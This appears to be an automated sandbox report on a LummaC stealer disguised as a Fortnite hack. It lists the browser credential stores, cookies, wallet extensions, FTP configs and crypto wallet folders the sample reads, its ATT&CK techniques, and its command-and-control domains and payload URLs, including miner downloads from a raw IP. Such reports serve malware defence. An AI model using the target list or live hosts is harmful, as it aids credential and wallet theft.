Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\13pckee1.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Directory queried: C:\Users\user\Documents\UQMPCTZARJ	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Directory queried: C:\Users\user\Documents\UQMPCTZARJ	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior
Source: C:\Users\user\Desktop\FortniteHack.exe1.exe	Directory queried: C:\Users\user\Documents\FACWLRWHGG	Jump to behavior

Source: Yara match	File source: 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: FortniteHack.exe1.exe PID: 6908, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: FortniteHack.exe1.exe PID: 6908, type: MEMORYSTR
Source: Yara match	File source: 2.2.FortniteHack.exe1.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.FortniteHack.exe1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2433287684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Windows Service	1 Windows Service	11 Deobfuscate/Decode Files or Information	LSASS Memory	11 File and Directory Discovery	Remote Desktop Protocol	41 Data from Local System	13 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	211 Process Injection	4 Obfuscated Files or Information	Security Account Manager	44 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 PowerShell	Login Hook	1 Scheduled Task/Job	2 Software Packing	NTDS	371 Security Software Discovery	Distributed Component Object Model	3 Clipboard Data	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	125 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	261 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	261 Virtualization/Sandbox Evasion	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	211 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
FortniteHack.exe1.exe	56%	Virustotal		Browse
FortniteHack.exe1.exe	58%	ReversingLabs	Win32.Trojan.LummaC
FortniteHack.exe1.exe	100%	Avira	TR/Crypt.Agent.lyqam

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\Dllhost\WinRing0x64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe	82%	ReversingLabs	ByteCode-MSIL.Trojan.Jalapeno

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://citydisco.bet/gdJISHm	0%	Avira URL Cloud	safe
http://185.215.113.51/conhost.exeY	0%	Avira URL Cloud	safe
http://185.215.113.51/conhost.exeP	0%	Avira URL Cloud	safe
http://185.215.113.51H	0%	Avira URL Cloud	safe
http://185.215.113.51/52	0%	Avira URL Cloud	safe
http://185.215.113.51/e	0%	Avira URL Cloud	safe
http://www.microsoft.cE	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISPrZo	0%	Avira URL Cloud	safe
http://pastebin.coml	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISl	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJIS-	0%	Avira URL Cloud	safe
https://citydisco.bet/gdJISX$	0%	Avira URL Cloud	safe
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	0%	Avira URL Cloud	safe
http://185.215.113.51/conhost.exem	0%	Avira URL Cloud	safe
http://crl.microsoft.p	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
citydisco.bet	188.114.96.3	true	false		high
pastebin.com	172.67.19.24	true	false		high

Contacted URLs

Name	Malicious	Reputation
bugildbett.top/bAuz	false	high
citydisco.bet/gdJIS	false	high
http://185.215.113.51/WinRing0x64.sys	false	high
https://pastebin.com/raw/YpJeSRBC	false	high
cjlaspcorne.icu/DbIps	false	high
mrodularmall.top/aNzS	false	high
jowinjoinery.icu/bdWUa	false	high
legenassedk.top/bdpWO	false	high
http://185.215.113.51/xmrig.exe	false	high
featureccus.shop/bdMAn	false	high
htardwarehu.icu/Sbdsa	false	high
https://citydisco.bet/gdJIS	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.215.113.51/WatchDog.exe	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003499000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696506299400400001.1&ci=1696506299033.12791&cta	FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_cd61a4703a8613be887576f2bd084bcc6f4756dccdbe5062	FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISHm	FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/pscore6	powershell.exe, 00000012.00000002.1451324562.0000000004941000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/WatchDog.exeEhttp://185.215.113.51/lolMiner.exe?http://185.215.113.51/xmrig.ex	FortniteHack.exe1.exe, 00000002.00000003.2023196435.00000000035B1000.00000004.00000800.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023358262.0000000000C94000.00000004.00000020.00020000.00000000.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000000.1423389973.0000000000ED2000.00000002.00000001.01000000.00000008.sdmp, 6Y9CVTAOHZQ67PGGTWC454FW0.exe.2.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISl	FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://citydisco.bet/	FortniteHack.exe1.exe, 00000002.00000003.1358983072.0000000000C67000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.51/52	FortniteHack.exe1.exe, 00000002.00000002.2435175433.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.cE	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1493079682.0000000006D19000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003426000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.1451324562.0000000004941000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/lolMiner.exe	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003351000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/conhost.exeY	FortniteHack.exe1.exe, 00000002.00000002.2434699473.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696506299400400001.2&ci=1696506299033.	FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51/	FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C60000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.51/conhost.exe	FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2434699473.0000000000C0B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.51/conhost.exeP	FortniteHack.exe1.exe, 00000002.00000002.2433881762.0000000000AFB000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://pastebin.coml	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003438000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51/e	FortniteHack.exe1.exe, 00000002.00000002.2435175433.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C60000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000012.00000002.1454102207.00000000059A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org?q=	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://ocsp.rootca1.amazontrust.com0:	FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	FortniteHack.exe1.exe, 00000002.00000003.1278679980.0000000003893000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.51	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.000000000347E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISPrZo	FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C4B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435000056.0000000000C4E000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1335607572.0000000000C41000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51H	6Y9CVTAOHZQ67PGGTWC454FW0.exe, 0000000F.00000002.1489743142.0000000003499000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/v20	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJIS-	FortniteHack.exe1.exe, 00000002.00000003.1246756203.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://citydisco.bet/gdJISX$	FortniteHack.exe1.exe, 00000002.00000003.1247756802.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.1276871245.0000000000C8B000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtabv20R	FortniteHack.exe1.exe, 00000002.00000003.1223744469.00000000035B8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000012.00000002.1451324562.0000000004A96000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	FortniteHack.exe1.exe, 00000002.00000003.1277487864.00000000035BE000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u	FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4CbmfQq%2B4pbW4pbWfpbX7ReNxR3UIG8zInwYIFIVs9e	FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg	FortniteHack.exe1.exe, 00000002.00000003.1279183307.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.51/conhost.exem	FortniteHack.exe1.exe, 00000002.00000003.2023753844.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000003.2023418275.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, FortniteHack.exe1.exe, 00000002.00000002.2435620195.0000000000C8F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
